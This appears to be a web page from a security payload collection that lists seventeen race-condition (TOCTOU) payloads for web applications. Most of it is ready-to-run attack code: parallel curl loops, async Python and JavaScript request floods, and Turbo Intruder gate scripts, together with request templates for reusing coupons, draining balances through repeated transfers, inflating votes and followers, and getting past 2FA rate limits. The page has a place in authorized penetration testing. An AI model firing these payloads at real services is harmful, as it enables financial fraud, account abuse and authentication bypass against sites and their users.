$loading...
Race condition payloads for exploiting time-of-check to time-of-use (TOCTOU) bugs in web applications. (17 payloads)
curl --parallel --parallel-max 50 -X POST https://target/api/redeem -d "code=GIFT123" -H "Cookie: session=abc" url url urlfor i in $(seq 1 100); do curl -s -X POST https://target/api/transfer -d "amount=1&to=attacker" -H "Cookie: sess=abc" & done; waitimport asyncio, aiohttp
async def race():
async with aiohttp.ClientSession() as s:
tasks = [s.post(url, data=payload, cookies=cookies) for _ in range(100)]
return await asyncio.gather(*tasks)Promise.all(Array(50).fill().map(() => fetch("/api/withdraw", {method:"POST",body:JSON.stringify({amount:100}),headers:{"Content-Type":"application/json"}})))def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=50, requestsPerConnection=1, pipeline=False)
for i in range(50):
engine.queue(target.req, gate="race")
engine.openGate("race")def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=50, pipeline=True)
for i in range(50):
engine.queue(target.req)engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=1, pipeline=False)
for i in range(30):
engine.queue(target.req, gate="go")
engine.openGate("go")POST /api/coupon/apply
{"code": "DISCOUNT50"}
# Send 20x in parallel — coupon applied multiple timesPOST /api/transfer
{"from": "attacker", "to": "victim", "amount": 100}
# Send 50x — balance may go negativePOST /api/vote
{"option": "A"}
# Send 100x — vote counted multiple timesPOST /api/follow
{"user_id": 123}
# Send 30x — follower count inflatedPOST /api/invite/accept
{"invite_id": "abc"}
# Send 10x — invite consumed but user added multiple timesPOST /api/2fa/verify
{"code": "123456"}
# Send 20x with different codes — bypass rate limit on 2FA# HTTP/2 multiplexing — all requests in a single TCP packet
# Use Burp's "Send group in parallel" or h2spacer
# Steps:
# 1. Capture request in Burp Repeater
# 2. Duplicate to 20 tabs
# 3. Select all → "Send group in parallel (single-packet attack)"# h2spacer tool:
python3 h2spacer.py -u https://target/api/redeem -m POST -d "code=GIFT" -H "Cookie: s=abc" -t 50# Signs a race condition exists:
# 1. Action is idempotent but has side effects (debit, credit, counter)
# 2. Check-then-act pattern without locking
# 3. "Already used" error on retry (but first batch succeeds)
# 4. Database uses READ COMMITTED (not SERIALIZABLE)
# 5. Response time varies under parallel load# Verify: compare response bodies
# If 20/50 requests return success instead of 1/50,
# the endpoint is race-vulnerableLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides